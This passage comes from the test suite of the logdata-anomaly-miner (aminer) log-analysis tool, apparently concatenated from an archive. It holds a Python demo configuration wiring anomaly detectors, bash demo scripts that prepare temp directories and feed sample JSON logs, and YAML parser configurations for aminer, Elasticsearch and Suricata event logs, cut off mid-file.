service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('/', FirstMatchModelElement('FirstMatchModelElement//optional', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), SequenceModelElement('se', [ FixedDataModelElement('FixedDME', b'Any:'), AnyByteDataModelElement('AnyByteDataModelElement')])]))) alphabet = b'ghijkl' service_children_ecd = [] for _, char in enumerate(alphabet): char = bytes([char]) service_children_ecd.append(FixedDataModelElement(char.decode(), char)) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('type', service_children_audit), FirstMatchModelElement('ECD', service_children_ecd), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) json_converter_handler = JsonConverterHandler([stream_printer_event_handler], analysis_context) anomaly_event_handlers = [json_converter_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers, use_real_time=True) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler
# Two handlers see unparsed atoms. The simple one is registered with stop_when_handled_flag=False, so handling
# continues to the verbose one (which additionally receives the parsing model); that one stops further handling.
simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers)
atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=False)
analysis_context.register_component(simple_unparsed_atom_handler, component_name="SimpleUnparsedHandler")

verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model)
atom_filter.add_handler(verbose_unparsed_atom_handler, stop_when_handled_flag=True)
analysis_context.register_component(verbose_unparsed_atom_handler, component_name="VerboseUnparsedHandler")

from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers)
atom_filter.add_handler(timestamps_unsorted_detector)
analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector")

from aminer.analysis import Rules
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector
# Match paths referenced by the login allowlist below.
_login_details_path = '/model/LoginDetails'
_login_minutes_path = '/model/LoginDetails/PastTime/Time/Minutes'
# A line is allowed when one of three alternatives holds:
#   1. a login line with the "x minutes ago" part whose user is not root,
#   2. a login line without the minutes part (any user),
#   3. a line that is not a LoginDetails line at all.
# DebugMatchRule(debug_match_result=True) looks like a debugging aid for the demo; its effect on the match
# result is not visible here (confirm against aminer.analysis.Rules).
allowlist_rules = [
    Rules.OrMatchRule([
        Rules.AndMatchRule([
            Rules.PathExistsMatchRule(_login_minutes_path),
            Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root')),
            Rules.DebugMatchRule(debug_match_result=True)]),
        Rules.AndMatchRule([
            Rules.NegationMatchRule(Rules.PathExistsMatchRule(_login_minutes_path)),
            Rules.PathExistsMatchRule(_login_details_path),
            Rules.DebugMatchRule(debug_match_result=True)]),
        Rules.NegationMatchRule(Rules.PathExistsMatchRule(_login_details_path))])]
# This rule list should trigger when the line does not look like: User root (logged in, logged out)
# or User 'username' (logged in, logged out) x minutes ago.
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filter.add_handler(parser_count) from aminer.analysis.EventTypeDetector import EventTypeDetector etd = EventTypeDetector(analysis_context.aminer_config, anomaly_event_handlers) analysis_context.register_component(etd, component_name="EventTypeDetector") atom_filter.add_handler(etd) from aminer.analysis.VariableTypeDetector import VariableTypeDetector vtd = VariableTypeDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, silence_output_except_indicator=False, output_logline=False, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableTypeDetector") atom_filter.add_handler(vtd) from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector vtd = VariableCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, etd, disc_div_thres=0.5, ignore_list=["/model/RandomTime"]) analysis_context.register_component(vtd, component_name="VariableCorrelationDetector") atom_filter.add_handler(vtd) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filter.add_handler(ecd) from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector efd = EventFrequencyDetector(analysis_context.aminer_config, 
anomaly_event_handlers, window_size=0.1) analysis_context.register_component(efd, component_name="EventFrequencyDetector") atom_filter.add_handler(efd) from aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ 
'/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule("vdmtmr", 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule("mtmr", 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import 
HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, [ '/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = 
NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector(analysis_context.aminer_config, [ '/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=[ '/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = 
TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/000077500000000000000000000000001500476301700256575ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/aminerJsonInputDemo.sh000077500000000000000000000030271500476301700321520ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh LOGFILE=/tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/json-input-demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" 
exit 1 fi # start json in same line read -r -d '' VAR << END {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END echo "$VAR" >> $LOGFILE # start json in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } } END # start everything in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", "onclick": "OpenDoc()"}, { "value": "Close", "onclick": "CloseDoc()"} ] } } } END echo "$VAR" >> $LOGFILE runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$FILE" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-aminer-demo.yml000066400000000000000000000101121500476301700315410ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/aminer.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: component_id type: DecimalIntegerValueModelElement name: 'component_id' - id: component_type type: FixedWordlistDataModelElement name: 'component_type' args: - 'AllowlistViolationDetector' - 'EnhancedNewMatchPathValueComboDetector' - 'EventCorrelationDetector' - 
'EventFrequencyDetector' - 'EventSequenceDetector' - 'EventTypeDetector' - 'HistogramAnalysis' - 'PathDependentHistogramAnalysis' - 'MatchFilter' - 'MatchValueAverageChangeDetector' - 'MatchValueStreamWriter' - 'MissingMatchPathValueDetector' - 'MissingMatchPathListValueDetector' - 'NewMatchIdValueComboDetector' - 'NewMatchPathDetector' - 'NewMatchPathValueComboDetector' - 'NewMatchPathValueDetector' - 'ParserCount' - 'TimeCorrelationDetector' - 'TimeCorrelationViolationDetector' - 'TimestampsUnsortedDetector' - 'VariableCorrelationDetector' - 'VariableTypeDetector' - id: component_name type: VariableByteDataModelElement name: 'component_name' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: message type: VariableByteDataModelElement name: 'message' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.()' - id: persistence_name type: FixedWordlistDataModelElement name: 'persistence_name' args: - 'Default' - 'suricata_fileinfo' - 'syslog_disconnected_user' - 'exim_no_host_name_found_ip' - 'suricata_err' - id: atom_paths type: VariableByteDataModelElement name: 'atom_paths' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-/' - id: affected_values type: AnyByteDataModelElement name: 'affected_values' - id: timestamps_no_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s' - id: timestamps_with_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s.%f' - id: timestamps type: FirstMatchModelElement name: 'timestamps' args: - timestamps_with_milliseconds - timestamps_no_milliseconds - id: log_lines_count type: DecimalIntegerValueModelElement name: 'log_lines_count' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: AnalysisComponent: AnalysisComponentIdentifier: component_id AnalysisComponentType: component_type AnalysisComponentName: component_name Message: message PersistenceFileName: persistence_name 
AffectedLogAtomPaths: - atom_paths _AffectedLogAtomValues: - affected_values ParsedLogAtom: 'ALLOW_ALL' LogData: RawLogData: - 'ALLOW_ALL' Timestamps: - timestamps LogLinesCount: log_lines_count Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-demo.sh000077500000000000000000000015211500476301700301100ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Demo started.." echo "" CFG_PATH=$1 OUT=$2 if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi FOUND=false LOGFILE="" while read p; do if [[ $FOUND = true ]]; then LOGFILE="$p" break fi if [[ "$p" == "LogResourceList:" ]]; then FOUND=true fi done < $CFG_PATH IFS="'" read -ra ADDR <<< "$LOGFILE" LOGFILE="${ADDR[1]:7}" # remove the file:// prefix. runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit $? 
logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-elastic-demo.yml000066400000000000000000000123021500476301700317150ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/elastic.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: _scroll_id type: Base64StringModelElement name: '_scroll_id' - id: took type: DecimalIntegerValueModelElement name: 'took' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'timed_out' args: - 'true' - 'false' - id: total type: DecimalIntegerValueModelElement name: 'total' - id: successful type: DecimalIntegerValueModelElement name: 'successful' - id: skipped type: DecimalIntegerValueModelElement name: 'skipped' - id: failed type: DecimalIntegerValueModelElement name: 'failed' - id: value type: DecimalIntegerValueModelElement name: 'value' - id: relation type: FixedDataModelElement name: 'relation' args: 'eq' - id: max_score type: DecimalFloatValueModelElement name: 'max_score' - id: _index type: DateTimeModelElement name: '_index' date_format: 'aminer-statusinfo-%Y.%m.%d' - id: _type type: FixedDataModelElement name: '_type' args: '_doc' - id: _id type: VariableByteDataModelElement name: '_id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_' - id: _score type: DecimalFloatValueModelElement name: '_score' - id: FromTime type: DecimalFloatValueModelElement name: 'FromTime' exponent_type: 'mandatory' - id: /parser/model/php type: DecimalIntegerValueModelElement name: '/parser/model/php' - id: 
/parser/model/event_type_str type: DecimalIntegerValueModelElement name: '/parser/model/event_type_str' - id: /parser/model/type_str type: DecimalIntegerValueModelElement name: '/parser/model/type_str' - id: /parser/model/classification type: DecimalIntegerValueModelElement name: '/parser/model/classification' - id: /parser/model/status_code type: DecimalIntegerValueModelElement name: '/parser/model/status_code' - id: /parser/model/host type: DecimalIntegerValueModelElement name: '/parser/model/host' - id: /parser/model/sp type: DecimalIntegerValueModelElement name: '/parser/model/sp' - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: ToTime type: DecimalFloatValueModelElement name: 'ToTime' exponent_type: 'mandatory' - id: fromtimestamp type: DateTimeModelElement name: 'fromtimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: totimestamp type: DateTimeModelElement name: 'totimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: version type: FixedDataModelElement name: 'version' args: '1' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: _scroll_id: _scroll_id took: took timed_out: bool_wordlist terminated_early: bool_wordlist _shards: total: total successful: successful skipped: skipped failed: failed hits: total: value: value relation: relation max_score: max_score hits: - _index: _index _type: _type _id: _id _score: _score _source: FromTime: FromTime StatusInfo: /parser/model/php: /parser/model/php /parser/model/event_type_str: /parser/model/event_type_str /parser/model/type_str: /parser/model/type_str /parser/model/classification: /parser/model/classification /parser/model/status_code: /parser/model/status_code /parser/model/host: /parser/model/host /parser/model/sp: /parser/model/sp timestamp: timestamp ToTime: ToTime fromtimestamp: fromtimestamp totimestamp: totimestamp version: version Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: 
StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-eve-demo.yml000066400000000000000000000613441500476301700310620ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/eve.json' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: _flow_id type: DecimalIntegerValueModelElement name: '_flow_id' - id: _in_iface type: FixedDataModelElement name: '_in_iface' args: 'eth0' - id: event_type type: FixedWordlistDataModelElement name: 'event_type' args: - 'dns' - 'http' - 'fileinfo' - 'stats' - 'flow' - 'alert' - 'tls' - id: ip_ipv4 type: IpAddressDataModelElement name: 'ipv4' - id: ip_ipv6 type: VariableByteDataModelElement name: 'ipv6' args: 'abcdefABCDEF0123456789:' - id: _src_ip type: FirstMatchModelElement name: '_src_ip' args: - ip_ipv4 - ip_ipv6 - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: FirstMatchModelElement name: '_dest_ip' args: - ip_ipv4 - ip_ipv6 - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'UDP' - 'TCP' - 'IPv6-ICMP' - id: _icmp_type type: DecimalIntegerValueModelElement name: '_icmp_type' - id: _icmp_code type: DecimalIntegerValueModelElement name: '_icmp_code' - id: type type: FixedWordlistDataModelElement name: 'type' args: - 'answer' - 'query' - id: id type: 
DecimalIntegerValueModelElement name: 'id' - id: _rcode type: FixedDataModelElement name: '_rcode' args: 'NXDOMAIN' - id: rrname_ip_lower type: DelimitedDataModelElement name: 'rrname_ip_lower' delimiter: '.in-addr.arpa' - id: rrname_addr_lower type: FixedDataModelElement name: 'rrname_addr_lower' args: '.in-addr.arpa' - id: rrname_lower type: SequenceModelElement name: 'rrname' args: - rrname_ip_lower - rrname_addr_lower - id: rrname_ip_upper type: DelimitedDataModelElement name: 'rrname_ip_upper' delimiter: '.IN-ADDR.ARPA' - id: rrname_addr_upper type: FixedDataModelElement name: 'rrname_addr_upper' args: '.IN-ADDR.ARPA' - id: rrname_upper type: SequenceModelElement name: 'rrname' args: - rrname_ip_upper - rrname_addr_upper - id: rrname type: FirstMatchModelElement name: 'rrname' args: - rrname_lower - rrname_upper - id: _rrtype type: FixedWordlistDataModelElement name: '_rrtype' args: - 'SOA' - 'PTR' - id: _ttl type: DecimalIntegerValueModelElement name: '_ttl' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: hostname type: FixedDataModelElement name: 'hostname' args: 'mail.spiral.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.;&=+$,/?%#\ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0' - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36' - id: _http_content_type type: FixedWordlistDataModelElement name: '_http_content_type' args: - 'text/html' - 'image/png' - 'application/javascript' - 'text/css' - 'image/vnd.microsoft.icon' - 'application/json' - 'image/gif' - 'audio/x-wav' - id: http_refer_base_url type: FixedDataModelElement name: 'http_refer_base_url' args: 'http://mail.spiral.com/' - id: optional_http_refer_base_url type: 
OptionalMatchModelElement name: 'optional_http_refer_base_url' args: http_refer_base_url - id: _http_refer type: SequenceModelElement name: '_http_refer' args: - http_refer_base_url - url - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - 'POST' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: _status type: DecimalIntegerValueModelElement name: '_status' - id: _redirect type: SequenceModelElement name: '_redirect' args: - optional_http_refer_base_url - url - id: length type: DecimalIntegerValueModelElement name: 'length' - id: _app_proto type: FixedWordlistDataModelElement name: '_app_proto' args: - 'http' - 'failed' - 'dns' - 'tls' - id: _app_proto_tc type: FixedDataModelElement name: '_app_proto_tc' args: 'http' - id: file_state type: FixedWordlistDataModelElement name: 'state' args: - 'CLOSED' - 'TRUNCATED' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: size type: DecimalIntegerValueModelElement name: 'size' - id: pkts_toserver type: DecimalIntegerValueModelElement name: 'pkts_toserver' - id: pkts_toclient type: DecimalIntegerValueModelElement name: 'pkts_toclient' - id: bytes_toserver type: DecimalIntegerValueModelElement name: 'bytes_toserver' - id: bytes_toclient type: DecimalIntegerValueModelElement name: 'bytes_toclient' - id: start type: DateTimeModelElement name: 'start' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: end type: DateTimeModelElement name: 'end' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: age type: DecimalIntegerValueModelElement name: 'age' - id: conn_state type: FixedWordlistDataModelElement name: 'state' args: - 'established' - 'closed' - 'fin_wait2' - 'new' - id: reason type: FixedWordlistDataModelElement name: 'reason' args: - 'timeout' - id: uptime type: DecimalIntegerValueModelElement name: 